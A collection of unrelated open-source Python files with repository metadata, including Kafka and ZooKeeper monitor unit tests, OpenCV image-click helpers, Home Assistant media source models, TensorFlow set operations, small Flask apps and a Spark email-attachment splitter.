class TestMurmurPartitioner(unittest.TestCase):
def test_hash_bytes(self):
p = Murmur2Partitioner(range(1000))
self.assertEqual(p.partition(bytearray(b'test')), p.partition(b'test'))
def test_hash_encoding(self):
p = Murmur2Partitioner(range(1000))
self.assertEqual(p.partition('test'), p.partition(u'test'))
def test_murmur2_java_compatibility(self):
p = Murmur2Partitioner(range(1000))
# compare with output from Kafka's org.apache.kafka.clients.producer.Partitioner
self.assertEqual(681, p.partition(b''))
self.assertEqual(524, p.partition(b'a'))
self.assertEqual(434, p.partition(b'ab'))
self.assertEqual(107, p.partition(b'abc'))
self.assertEqual(566, p.partition(b'123456789'))
self.assertEqual(742, p.partition(b'\x00 '))
|
{
"content_hash": "1e1887f9bfad52ef666075a845fed61f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 88,
"avg_line_length": 40.26086956521739,
"alnum_prop": 0.6825053995680346,
"repo_name": "gamechanger/kafka-python",
"id": "67cd83bc4114ee0f18946e74b17e2b0fb0121406",
"size": "926",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_partitioner.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "559844"
},
{
"name": "Shell",
"bytes": "2646"
}
],
"symlink_target": ""
}
|
import socket
import sys
import time
from functools import partial
from tornado import gen
from tornado.testing import AsyncTestCase, gen_test
from zookeeper_monitor import zk
from .fixtures import host as FIXTURE
try:
from unittest.mock import call, patch, Mock, MagicMock
except ImportError:
from mock import call, patch, Mock, MagicMock
class HostTest(AsyncTestCase):
def setUp(self):
super(HostTest, self).setUp()
self.maxDiff = None
def tearDown(self):
patch.stopall()
super(HostTest, self).tearDown()
def test_parse_info_ok(self):
for case in FIXTURE.parse_info_data['ok']:
host = zk.Host('localhost', 2181)
ret = host._parse_info(case['in'])
for attr, val in case['out'].items():
self.assertEqual(host.info[attr], val)
self.assertEqual(ret[attr], val)
self.assertEqual(getattr(host, 'health'), getattr(zk.Host, case['health']))
self.assertEqual(host.info['mode'], getattr(zk.Host, case['mode'], case['mode']))
def test_parse_info_ok_wo_update(self):
for case in FIXTURE.parse_info_data['ok']:
host = zk.Host('localhost', 2181)
ret = host._parse_info(case['in'], update_host_info=False)
for attr, val in case['out'].items():
self.assertFalse(attr in host.info and host.info[attr])
self.assertEqual(ret[attr], val)
self.assertEqual(getattr(host, 'health'), getattr(zk.Host, case['health']))
self.assertEqual(host.info['mode'], zk.Host.UNKNOWN)
def test_parse_info_err_parse(self):
for case in FIXTURE.parse_info_data['raise_on_parse']:
host = zk.Host('localhost', 2181)
host.is_valid = MagicMock(return_value=True)
self.assertRaises(zk.HostInvalidInfo, partial(host._parse_info, case['in']))
self.assertEqual(getattr(host, 'health'), getattr(zk.Host, case['health']))
host.is_valid.assert_called_once()
self.assertEqual(host.info['mode'], getattr(zk.Host, case['mode'], case['mode']))
def test_parse_info_err_validate(self):
for case in FIXTURE.parse_info_data['raise_on_validate']:
host = zk.Host('localhost', 2181)
self.assertRaises(zk.HostInvalidInfo, partial(host._parse_info, case['in']))
self.assertEqual(getattr(host, 'health'), getattr(zk.Host, case['health']))
self.assertEqual(host.info['mode'], getattr(zk.Host, case['mode'], case['mode']))
def test_parse_stat(self):
for name, case in FIXTURE.parse_stat_data.items():
host = zk.Host('localhost', 2181)
            print('CASE %s' % name)
parsed, not_parsed, errors = host._parse_stat(case['in'])
self.assertEqual(parsed, case['parsed'])
self.assertEqual(not_parsed, case['not_parsed'])
def test_parse_stat_error(self):
re_obj = MagicMock()
match_obj = Mock()
re_obj.search = MagicMock(return_value=match_obj)
patch('zookeeper_monitor.zk.host.re', re_obj).start()
keyerror = MagicMock(return_value={'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 6})
        too_few = MagicMock(return_value=[1, 2, 3, 4])
        too_many = MagicMock(return_value=[1, 2, 3, 4, 5, 6, 7])
case = FIXTURE.parse_stat_data['ok']
for groups_mock in [keyerror, too_few, too_many]:
match_obj.groups = groups_mock
host = zk.Host('localhost', 2181)
parsed, not_parsed, errors = host._parse_stat(case['in'])
self.assertNotEqual(parsed, case['parsed'])
self.assertEqual(not_parsed, [])
proper = dict(case['parsed'])
proper['clients'] = []
self.assertEqual(parsed, proper)
self.assertEqual(
errors, [el.strip() for el in case['in'] if not el.startswith('Zookeeper')])
def test_init_default(self):
host = zk.Host('localhost')
self.assertEqual(host.addr, 'localhost')
self.assertEqual(host.port, 2181)
self.assertEqual(host.dc, None)
self.assertEqual(host.cluster, None)
self.assertIsInstance(host.timeout, int)
self.assertEqual(host.info['zxid'], None)
self.assertEqual(host.info['mode'], zk.Host.UNKNOWN)
self.assertEqual(host.health, zk.Host.HOST_UNCHECKED)
def test_init(self):
host = zk.Host('dummy', port=9999, cluster='FAKE', dc='eu-west')
self.assertEqual(host.addr, 'dummy')
self.assertEqual(host.port, 9999)
self.assertEqual(host.dc, 'eu-west')
self.assertEqual(host.cluster, 'FAKE')
self.assertEqual(host.info['zxid'], None)
self.assertEqual(host.info['mode'], zk.Host.UNKNOWN)
self.assertEqual(host.health, zk.Host.HOST_UNCHECKED)
def test_init_err_no_addr(self):
self.assertRaises(TypeError, partial(zk.Host, port=9999, dc='eu-west'))
def _prepare_executes_mock(self, ip='127.0.0.1', **kwargs):
iostream_obj = MagicMock()
for attr, val in kwargs.items():
mock = val if (isinstance(val, Mock) or hasattr(val, '__call__')) else MagicMock(return_value=val)
setattr(iostream_obj, attr, mock)
iostream = MagicMock(return_value=iostream_obj)
resolver = MagicMock(
return_value=gen.maybe_future((socket.AF_INET, ip))
)
patch('zookeeper_monitor.zk.host.Host._resolve', resolver).start()
patch('zookeeper_monitor.zk.host.socket.socket', MagicMock).start()
patch('zookeeper_monitor.zk.host.IOStream', iostream).start()
patch('zookeeper_monitor.zk.host.IOLoop', self.io_loop).start()
return resolver, iostream, iostream_obj
@gen_test
def test_execute(self):
some_data = 'DATA'
        some_ip = '123.45.67.89'
resolver, iostream, iostream_obj = self._prepare_executes_mock(
ip=some_ip,
connect=None,
#write=lambda a, callback: callback(None),
write=MagicMock(side_effect=lambda a, callback: callback(None)),
read_until_close=lambda callback: callback(some_data)
)
host = zk.Host('localhost', 2181)
ret_test = yield host.execute('sample_command')
self.assertEqual(ret_test, some_data)
self.assertEqual(resolver.call_count, 1)
iostream_obj.connect.assert_called_once_with(some_ip)
iostream_obj.write.assert_called_once()
args, kwargs = iostream_obj.write.call_args
self.assertEqual((b'sample_command\n',), args)
iostream_obj.write.reset_mock()
yield host.execute(' B__sample_command \n')
iostream_obj.write.assert_called_once()
args, kwargs = iostream_obj.write.call_args
self.assertEqual((b'B__sample_command\n',), args)
def test_set_timeout(self):
host = zk.Host('localhost', 2181)
host.set_timeout(100)
self.assertEqual(host.timeout, 100)
host.set_timeout(0.01)
self.assertEqual(host.timeout, 0.01)
self.assertRaises(zk.HostSetTimeoutValueError, partial(host.set_timeout, -1))
self.assertRaises(zk.HostSetTimeoutTypeError, partial(host.set_timeout, 'string'))
def test_str(self):
host = zk.Host('dummy.host.domain', 1133)
self.assertEqual(str(host), 'dummy.host.domain:1133')
def test_repr(self):
host = zk.Host('dummy.host.domain', 1133)
self.assertIn('dummy.host.domain:1133', repr(host))
@gen_test
def test_get_info(self):
host = zk.Host('localhost', 2181)
host.srvr = MagicMock(return_value=gen.maybe_future('Some result'))
res = yield host.get_info()
host.srvr.assert_called_once()
self.assertIsInstance(res, dict)
@gen_test
def test_resolve(self):
ph_io_loop = 'ioloop placeholder'
resolver_obj = Mock()
resolver_obj.resolve = MagicMock(return_value=gen.maybe_future(('a', 'b', 'c')))
resolver = MagicMock(return_value=resolver_obj)
patch('zookeeper_monitor.zk.host.Resolver', resolver).start()
host = zk.Host('localhost', 2181)
res = yield host._resolve(ph_io_loop)
resolver.assert_called_once_with(io_loop=ph_io_loop)
resolver_obj.assert_called_once()
self.assertEqual(res, 'a')
@gen_test
def test_srvr_ok(self):
host = zk.Host('localhost', 2181)
host.execute = MagicMock(return_value=gen.maybe_future(
FIXTURE.result_of_execute_srvr_ok.encode('utf-8')
))
ret = yield host.srvr()
host.execute.assert_called_once_with('srvr')
self.assertEqual(host.health, zk.Host.HOST_HEALTHY)
self.assertIsInstance(ret, dict)
@gen_test
def test_srvr_err(self):
host = zk.Host('localhost', 2181)
host.execute = MagicMock(return_value=gen.maybe_future(
FIXTURE.result_of_execute_srvr_err.encode('utf-8')
))
ret = yield host.srvr()
host.execute.assert_called_once()
self.assertEqual(host.health, zk.Host.HOST_ERROR)
self.assertFalse(ret)
host = zk.Host('localhost', 2181)
host.execute = MagicMock(side_effect=Exception)
ret = yield host.srvr()
self.assertFalse(ret)
self.assertEqual(host.health, zk.Host.HOST_ERROR)
@gen_test
def test_srvr_timeout(self):
host = zk.Host('localhost', 2181)
host.execute = MagicMock(side_effect=zk.host.HostConnectionTimeout)
ret = yield host.srvr()
self.assertFalse(ret)
self.assertEqual(host.health, zk.Host.HOST_TIMEOUT)
@gen_test
def test_envi(self):
host = zk.Host('localhost', 2181)
host.execute = MagicMock(return_value=gen.maybe_future(
FIXTURE.envi['in'].encode('utf-8')
))
ret = yield host.envi()
host.execute.assert_called_once_with('envi')
self.assertEqual(ret, FIXTURE.envi['out'])
@gen_test
def test_dump_kill_srst_ruok_reqs(self):
for cmd in ['dump', 'kill', 'ruok', 'srst', 'reqs']:
host = zk.Host('localhost', 2181)
host.execute = MagicMock(return_value=gen.maybe_future(
FIXTURE.simple['in'].encode('utf-8')
))
method = getattr(host, cmd)
ret = yield method()
host.execute.assert_called_once_with(cmd)
host.execute.reset_mock()
self.assertEqual(ret, FIXTURE.simple['out'])
|
{
"content_hash": "eb4db16d284d8716f9f4b95399620c8c",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 110,
"avg_line_length": 39.48880597014925,
"alnum_prop": 0.6078616649343287,
"repo_name": "kwarunek/zookeeper_monitor",
"id": "8727c499730eeca32f3badc16a2b33991884bce0",
"size": "10606",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_host.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "5607"
},
{
"name": "Python",
"bytes": "42000"
}
],
"symlink_target": ""
}
|
import cv2
import os
import numpy as np
from copy import copy
clicks = []
click_counter = 0
def _click_callback(event, x, y, flags, param):
global click_counter
global clicks
if event == cv2.EVENT_LBUTTONDOWN:
clicks.append((x, y))
click_counter -= 1
def click_on_image(
image, times=1, mark=False, delay=100,
text='Click on image', counter=True):
    '''
    Prompt the user with a window where they can click a predetermined
    number of times to complete the action.
    @params:
        - image: np.array, image to show the user
        - times: integer, number of clicks requested from the user
        - mark: boolean, leave a mark on the image where clicked
        - delay: integer, refresh rate - how many milliseconds the image is
            shown before refresh
        - text: string, text to show on the window
        - counter: boolean, prefix the window title with a click counter
    '''
img = image.copy()
if len(img.shape) == 2:
img = np.stack([img] * 3, -1)
scale = get_scale(img)
global clicks
global click_counter
clicks = []
click_counter = times
while click_counter > 0:
        if mark and len(clicks) > 0:
cv2.circle(
img,
(int(clicks[-1][0] / scale), int(clicks[-1][1] / scale)),
int(img.shape[0] / 100.0), (255, 255, 255), 3)
cv2.circle(
img,
(int(clicks[-1][0] / scale), int(clicks[-1][1] / scale)),
int(img.shape[0] / 100.0), (0, 0, 0), -1)
if counter:
t = '(%s/%s) - %s' % (times - click_counter, times, text)
else:
t = text
cv2.namedWindow(t)
cv2.setMouseCallback(t, _click_callback)
k = show_image(img, text=t, destroy=False, time=delay)
if k != -1:
cv2.destroyAllWindows()
return k
cv2.destroyAllWindows()
out_clicks = copy(clicks)
clicks = []
out_clicks = np.asarray(np.array(out_clicks) / scale, dtype=int)
return out_clicks
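# Illustrative usage (assumes an image exists at the given path; returns a key
# code early if the user presses a key instead of clicking):
#     img = cv2.imread('sample.jpg')
#     pts = click_on_image(img, times=4, mark=True, text='Pick 4 corners')
#     # pts is a 4x2 int array of (x, y) positions mapped back to the
#     # original (unscaled) image coordinates.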
def get_scale(image, max_dimensions=(750, 1200)):
'''
Given an image and maximum display dimensions,
get_scale returns a scale factor corresponding to the
optimal image size reduction to fit to the screen.
'''
dims = image.shape
if 0 in dims:
raise TypeError('Cannot show image without dimensions')
scale = min([
float(max_dimensions[0]) / dims[0],
float(max_dimensions[1]) / dims[1]])
return scale
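# Example: a 3000x4000 image with the default (750, 1200) limits gives
# scale = min(750 / 3000, 1200 / 4000) = min(0.25, 0.3) = 0.25, so the
# preview is shown at a quarter of its original size.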
def show_image(image, text='Image', time=0, destroy=True):
if os.uname()[-1] == 'armv7l':
return
scale = get_scale(image)
resized_image = image.copy()
resized_image = cv2.resize(resized_image, None, fx=scale, fy=scale)
cv2.imshow(str(text), resized_image)
k = cv2.waitKey(time)
if destroy:
cv2.destroyAllWindows()
return k
|
{
"content_hash": "f0020ec57067cd8b7cfad59f0850d32d",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 73,
"avg_line_length": 30.0531914893617,
"alnum_prop": 0.5830088495575221,
"repo_name": "Wing0/oskui",
"id": "1eab7dd7f4dfa1917844da9f577e3d7b575c10bc",
"size": "2825",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oskui/visual.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9557"
}
],
"symlink_target": ""
}
|
"""Media Source models."""
from __future__ import annotations
from abc import ABC
from dataclasses import dataclass
from homeassistant.components.media_player import BrowseMedia
from homeassistant.components.media_player.const import (
MEDIA_CLASS_CHANNEL,
MEDIA_CLASS_DIRECTORY,
MEDIA_TYPE_CHANNEL,
MEDIA_TYPE_CHANNELS,
)
from homeassistant.core import HomeAssistant, callback
from .const import DOMAIN, URI_SCHEME, URI_SCHEME_REGEX
@dataclass
class PlayMedia:
"""Represents a playable media."""
url: str
mime_type: str
class BrowseMediaSource(BrowseMedia):
"""Represent a browsable media file."""
children: list[BrowseMediaSource] | None
def __init__(self, *, domain: str | None, identifier: str | None, **kwargs):
"""Initialize media source browse media."""
media_content_id = f"{URI_SCHEME}{domain or ''}"
if identifier:
media_content_id += f"/{identifier}"
super().__init__(media_content_id=media_content_id, **kwargs)
self.domain = domain
self.identifier = identifier
@dataclass
class MediaSourceItem:
"""A parsed media item."""
hass: HomeAssistant
domain: str | None
identifier: str
async def async_browse(self) -> BrowseMediaSource:
"""Browse this item."""
if self.domain is None:
base = BrowseMediaSource(
domain=None,
identifier=None,
media_class=MEDIA_CLASS_DIRECTORY,
media_content_type=MEDIA_TYPE_CHANNELS,
title="Media Sources",
can_play=False,
can_expand=True,
children_media_class=MEDIA_CLASS_CHANNEL,
)
base.children = [
BrowseMediaSource(
domain=source.domain,
identifier=None,
media_class=MEDIA_CLASS_CHANNEL,
media_content_type=MEDIA_TYPE_CHANNEL,
title=source.name,
can_play=False,
can_expand=True,
)
for source in self.hass.data[DOMAIN].values()
]
return base
return await self.async_media_source().async_browse_media(self)
async def async_resolve(self) -> PlayMedia:
"""Resolve to playable item."""
return await self.async_media_source().async_resolve_media(self)
@callback
def async_media_source(self) -> MediaSource:
"""Return media source that owns this item."""
return self.hass.data[DOMAIN][self.domain]
@classmethod
def from_uri(cls, hass: HomeAssistant, uri: str) -> MediaSourceItem:
"""Create an item from a uri."""
match = URI_SCHEME_REGEX.match(uri)
if not match:
raise ValueError("Invalid media source URI")
domain = match.group("domain")
identifier = match.group("identifier")
return cls(hass, domain, identifier)
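# Illustrative: assuming URI_SCHEME is 'media-source://', a URI of the form
# 'media-source://some_domain/some/identifier' parses into
# domain='some_domain' and identifier='some/identifier', while the bare
# 'media-source://' URI gives domain=None and browses the root listing above
# (the exact capture groups are defined by URI_SCHEME_REGEX in const.py).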
class MediaSource(ABC):
"""Represents a source of media files."""
name: str = None
def __init__(self, domain: str):
"""Initialize a media source."""
self.domain = domain
if not self.name:
self.name = domain
async def async_resolve_media(self, item: MediaSourceItem) -> PlayMedia:
"""Resolve a media item to a playable item."""
raise NotImplementedError
async def async_browse_media(
self, item: MediaSourceItem, media_types: tuple[str]
) -> BrowseMediaSource:
"""Browse media."""
raise NotImplementedError
|
{
"content_hash": "38b4be2d36e2d1d07ef99dfc46e1e72b",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 80,
"avg_line_length": 29.398373983739837,
"alnum_prop": 0.5998340707964602,
"repo_name": "adrienbrault/home-assistant",
"id": "aa17fff320efe1f1e7cd1147f3808e9256fb417f",
"size": "3616",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/media_source/models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "32021043"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
}
|
class LadLoggingConfigException(Exception):
"""
Custom exception class for LAD logging (syslog & filelogs) config errors
"""
pass
class LadPerfCfgConfigException(Exception):
"""
Custom exception class for LAD perfCfg (raw OMI queries) config errors
"""
pass
|
{
"content_hash": "294e1284ebd8e9760a8f4431d7314313",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 76,
"avg_line_length": 24.333333333333332,
"alnum_prop": 0.6952054794520548,
"repo_name": "Azure/azure-linux-extensions",
"id": "7d84b3c1edcb10e3ddcd3e67b119a74102632e95",
"size": "1462",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "Diagnostic/Utils/lad_exceptions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "81542"
},
{
"name": "C++",
"bytes": "1038973"
},
{
"name": "CMake",
"bytes": "11642"
},
{
"name": "Dockerfile",
"bytes": "1539"
},
{
"name": "Go",
"bytes": "136483"
},
{
"name": "HTML",
"bytes": "32736"
},
{
"name": "JavaScript",
"bytes": "22883"
},
{
"name": "Makefile",
"bytes": "11405"
},
{
"name": "PowerShell",
"bytes": "22400"
},
{
"name": "Python",
"bytes": "5124041"
},
{
"name": "Roff",
"bytes": "3827"
},
{
"name": "Shell",
"bytes": "66718"
}
],
"symlink_target": ""
}
|
"""Python layer for set_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.framework.python.framework import tensor_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import load_library
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import resource_loader
_set_ops = load_library.load_op_library(
resource_loader.get_path_to_datafile("_set_ops.so"))
assert _set_ops, "Could not load _set_ops.so."
_VALID_DTYPES = set([
dtypes.int8, dtypes.int16, dtypes.int32, dtypes.int64,
dtypes.uint8, dtypes.uint16, dtypes.string])
def _size_shape(unused_op):
"""Shape function for SetSize op."""
return [tensor_shape.unknown_shape()]
def set_size(a, validate_indices=True):
"""Compute number of unique elements along last dimension of `a`.
Args:
a: `SparseTensor`, with indices sorted in row-major order.
validate_indices: Whether to validate the order and range of sparse indices
in `a`.
Returns:
For `a` ranked `n`, this is a `Tensor` with rank `n-1`, and the same 1st
`n-1` dimensions as `a`. Each value is the number of unique elements in
the corresponding `[0...n-1]` dimension of `a`.
Raises:
    TypeError: If `a` is an invalid type.
"""
a = tensor_util.convert_to_tensor_or_sparse_tensor(a, name="a")
if not isinstance(a, ops.SparseTensor):
raise TypeError("Expected `SparseTensor`, got %s." % a)
if a.values.dtype.base_dtype not in _VALID_DTYPES:
raise TypeError("Invalid dtype %s." % a.values.dtype)
# pylint: disable=protected-access
return _set_ops.set_size(a.indices, a.values, a.shape, validate_indices)
# TODO(ptucker): ops vs @ops?
ops.NoGradient("SetSize")
ops.RegisterShape("SetSize")(_size_shape)
def _sparse_shape(op):
"""Shape function for `SparseTensor` result."""
num_rows = (op.inputs[0].get_shape()[0] if
op.type in ("DenseToSparseOperation", "DenseToDenseOperation")
else None)
return [
tensor_shape.TensorShape([num_rows, 2]),
tensor_shape.unknown_shape(1),
tensor_shape.unknown_shape(1),
]
def _set_operation(a, b, set_operation, validate_indices=True):
"""Compute set operation of elements in last dimension of `a` and `b`.
All but the last dimension of `a` and `b` must match.
Args:
a: `Tensor` or `SparseTensor` of the same type as `b`. If sparse, indices
must be sorted in row-major order.
b: `Tensor` or `SparseTensor` of the same type as `a`. Must be
`SparseTensor` if `a` is `SparseTensor`. If sparse, indices must be
sorted in row-major order.
    set_operation: String indicating set operation. See
SetOperationOp::SetOperationFromContext for valid values.
validate_indices: Whether to validate the order and range of sparse indices
in `a` and `b`.
Returns:
A `SparseTensor` with the same rank as `a` and `b`, and all but the last
dimension the same. Elements along the last dimension contain the results
of the set operation.
Raises:
TypeError: If inputs are invalid types.
ValueError: If `a` is sparse and `b` is dense.
"""
a = tensor_util.convert_to_tensor_or_sparse_tensor(a, name="a")
if a.dtype.base_dtype not in _VALID_DTYPES:
raise TypeError("'a' invalid dtype %s." % a.dtype)
b = tensor_util.convert_to_tensor_or_sparse_tensor(b, name="b")
if b.dtype.base_dtype != a.dtype.base_dtype:
raise TypeError("Types don't match, %s vs %s." % (a.dtype, b.dtype))
# pylint: disable=protected-access
if isinstance(a, ops.SparseTensor):
if isinstance(b, ops.SparseTensor):
indices, values, shape = _set_ops.sparse_to_sparse_set_operation(
a.indices, a.values, a.shape, b.indices, b.values, b.shape,
set_operation, validate_indices)
else:
raise ValueError("Sparse,Dense is not supported, but Dense,Sparse is. "
"Please flip the order of your inputs.")
elif isinstance(b, ops.SparseTensor):
indices, values, shape = _set_ops.dense_to_sparse_set_operation(
a, b.indices, b.values, b.shape, set_operation, validate_indices)
else:
indices, values, shape = _set_ops.dense_to_dense_set_operation(
a, b, set_operation, validate_indices)
# pylint: enable=protected-access
return ops.SparseTensor(indices, values, shape)
def set_intersection(a, b, validate_indices=True):
"""Compute set intersection of elements in last dimension of `a` and `b`.
All but the last dimension of `a` and `b` must match.
Args:
a: `Tensor` or `SparseTensor` of the same type as `b`. If sparse, indices
must be sorted in row-major order.
b: `Tensor` or `SparseTensor` of the same type as `a`. Must be
`SparseTensor` if `a` is `SparseTensor`. If sparse, indices must be
sorted in row-major order.
validate_indices: Whether to validate the order and range of sparse indices
in `a` and `b`.
Returns:
A `SparseTensor` with the same rank as `a` and `b`, and all but the last
dimension the same. Elements along the last dimension contain the
intersections.
"""
return _set_operation(a, b, "intersection", validate_indices)
ops.NoGradient("SetIntersection")
ops.RegisterShape("SetIntersection")(_sparse_shape)
def set_difference(a, b, aminusb=True, validate_indices=True):
"""Compute set difference of elements in last dimension of `a` and `b`.
All but the last dimension of `a` and `b` must match.
Args:
a: `Tensor` or `SparseTensor` of the same type as `b`. If sparse, indices
must be sorted in row-major order.
b: `Tensor` or `SparseTensor` of the same type as `a`. Must be
`SparseTensor` if `a` is `SparseTensor`. If sparse, indices must be
sorted in row-major order.
aminusb: Whether to subtract `b` from `a`, vs vice versa.
validate_indices: Whether to validate the order and range of sparse indices
in `a` and `b`.
Returns:
A `SparseTensor` with the same rank as `a` and `b`, and all but the last
dimension the same. Elements along the last dimension contain the
differences.
"""
return _set_operation(a, b, "a-b" if aminusb else "b-a", validate_indices)
ops.NoGradient("SetDifference")
ops.RegisterShape("SetDifference")(_sparse_shape)
def set_union(a, b, validate_indices=True):
"""Compute set union of elements in last dimension of `a` and `b`.
All but the last dimension of `a` and `b` must match.
Args:
a: `Tensor` or `SparseTensor` of the same type as `b`. If sparse, indices
must be sorted in row-major order.
b: `Tensor` or `SparseTensor` of the same type as `a`. Must be
`SparseTensor` if `a` is `SparseTensor`. If sparse, indices must be
sorted in row-major order.
validate_indices: Whether to validate the order and range of sparse indices
in `a` and `b`.
Returns:
A `SparseTensor` with the same rank as `a` and `b`, and all but the last
dimension the same. Elements along the last dimension contain the
unions.
"""
return _set_operation(a, b, "union", validate_indices)
ops.NoGradient("SetUnion")
ops.RegisterShape("SetUnion")(_sparse_shape)
|
{
"content_hash": "6ec3f974b24c971e2029fadd6364359d",
"timestamp": "",
"source": "github",
"line_count": 197,
"max_line_length": 79,
"avg_line_length": 37.16751269035533,
"alnum_prop": 0.6857416006555586,
"repo_name": "Lab603/PicEncyclopedias",
"id": "4ed4370d92ceda53e081016164ef36a202feb75e",
"size": "8011",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "jni-build/jni-build/jni/include/tensorflow/contrib/metrics/python/ops/set_ops.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "361482"
},
{
"name": "C++",
"bytes": "22994090"
},
{
"name": "CMake",
"bytes": "72924"
},
{
"name": "CSS",
"bytes": "1548"
},
{
"name": "HTML",
"bytes": "1040352"
},
{
"name": "Java",
"bytes": "252082"
},
{
"name": "JavaScript",
"bytes": "25902"
},
{
"name": "Jupyter Notebook",
"bytes": "3547008"
},
{
"name": "Makefile",
"bytes": "47206"
},
{
"name": "Objective-C",
"bytes": "10664"
},
{
"name": "Objective-C++",
"bytes": "91354"
},
{
"name": "Python",
"bytes": "19063444"
},
{
"name": "Shell",
"bytes": "476334"
},
{
"name": "TypeScript",
"bytes": "1264488"
}
],
"symlink_target": ""
}
|
import flask, flask.views
users = {'jake':'bacon'}
class Login(flask.views.MethodView):
def get(self):
return flask.render_template('login.html')
def post(self):
if 'logout' in flask.request.form:
flask.session.pop('username', None)
return flask.redirect(flask.url_for('login'))
required = ['username', 'passwd']
for r in required:
if r not in flask.request.form:
flask.flash("Error: {0} is required.".format(r))
return flask.redirect(flask.url_for('login'))
username = flask.request.form['username']
passwd = flask.request.form['passwd']
if username in users and users[username] == passwd:
flask.session['username'] = username
else:
flask.flash("Username doesn't exist or incorrect password")
return flask.redirect(flask.url_for('login'))
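# Illustrative registration (assumes a Flask `app` with a secret key
# configured elsewhere in the tutorial):
#     app.add_url_rule('/login', view_func=Login.as_view('login'))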
|
{
"content_hash": "bc5996dcfbe5f912e95cfedba85c6167",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 71,
"avg_line_length": 39.291666666666664,
"alnum_prop": 0.5832449628844114,
"repo_name": "sergeimoiseev/egrixcalc",
"id": "cdd2d7a7e8c4c47856f39211324f82327beb4f46",
"size": "943",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "part 5 - static pages/final/login.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "309"
},
{
"name": "CSS",
"bytes": "7337"
},
{
"name": "HTML",
"bytes": "76658"
},
{
"name": "Python",
"bytes": "89175"
},
{
"name": "Shell",
"bytes": "808"
}
],
"symlink_target": ""
}
|
from flask import Flask, request, send_from_directory
import os
port = int(os.getenv("PORT", 9099))
app = Flask(__name__)
@app.route("/<path:path>")
def serve_page(path):
return send_from_directory("static", path)
@app.route("/")
def main():
"""Adjust the presentation_name if you rename the jupyter notebook."""
presentation_name = "presentation_template.slides.html"
return app.send_static_file(presentation_name)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=port)
|
{
"content_hash": "a01b84d27126fb8dba16c1c5f7f73b3c",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 74,
"avg_line_length": 26.473684210526315,
"alnum_prop": 0.6719681908548708,
"repo_name": "mlmerile/presagir",
"id": "b0608d93ea7a7cde101ee9b8ab5c8fa310293af7",
"size": "503",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "static/run.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "552332"
},
{
"name": "GLSL",
"bytes": "3308"
},
{
"name": "HTML",
"bytes": "683700"
},
{
"name": "JavaScript",
"bytes": "14670186"
},
{
"name": "Jupyter Notebook",
"bytes": "19879"
},
{
"name": "Python",
"bytes": "2246"
},
{
"name": "Shell",
"bytes": "189"
},
{
"name": "Smarty",
"bytes": "10152"
}
],
"symlink_target": ""
}
|
import json
import argparse
import datetime
import os
from filters import valid_json_filter
from functools import partial
from pyspark import SparkContext, SparkConf
def rmkey(k, o):
if k in o:
del o[k]
return o
def extractKeys(keys, o):
rtn = {}
for k in keys:
if k in o:
rtn[k] = o[k]
return rtn
def removeAttachments(x):
x['attachments'] = map(lambda o: rmkey('contents64', o), x['attachments'])
return x
def extractAttachments(x):
parent_fields = {
'id' : x['id'],
'datetime' : x['datetime'],
"ingest_id" : x["ingest_id"],
"case_id" : x["case_id"],
"alt_ref_id" : x["alt_ref_id"],
"label" : x["label"],
"original_artifact" : x["original_artifact"]
}
attachments = map(lambda o: extractKeys([
'guid',
'extension',
'filename',
'content',
'contents64',
'content_extracted',
'content_encrypted',
'content_length',
'content_type',
'content_hash',
'content_tika_langid',
'exif',
'image_analytics',
'metadata',
'size'
], o), x['attachments'])
attachments = [dict(a, **parent_fields) for a in attachments]
return attachments
def dump(x):
return json.dumps(x)
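# Illustrative: for an email record such as
#     {'id': '1', 'datetime': '...', 'ingest_id': 'i', 'case_id': 'c',
#      'alt_ref_id': 'a', 'label': 'l', 'original_artifact': {},
#      'attachments': [{'guid': 'g', 'filename': 'f.pdf',
#                       'contents64': '<base64>'}]}
# removeAttachments() strips each 'contents64' payload in place, while
# extractAttachments() emits one dict per attachment annotated with the
# parent email's identifying fields (id, datetime, ingest_id, ...).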
if __name__ == "__main__":
    desc = 'newman split emails and attachments for indexing'
parser = argparse.ArgumentParser(
description=desc,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=desc)
parser.add_argument("input_emails_content_path", help="joined email extracted content and base64 attachment")
parser.add_argument("output_path_emails", help="output directory for spark results emails without base64 attachment")
parser.add_argument("output_path_raw_attachments", help="output directory for spark results attachments ")
parser.add_argument("-v", "--validate_json", action="store_true", help="Filter broken json. Test each json object and output broken objects to tmp/failed.")
args = parser.parse_args()
lex_date = datetime.datetime.utcnow().strftime('%Y%m%d%H%M%S')
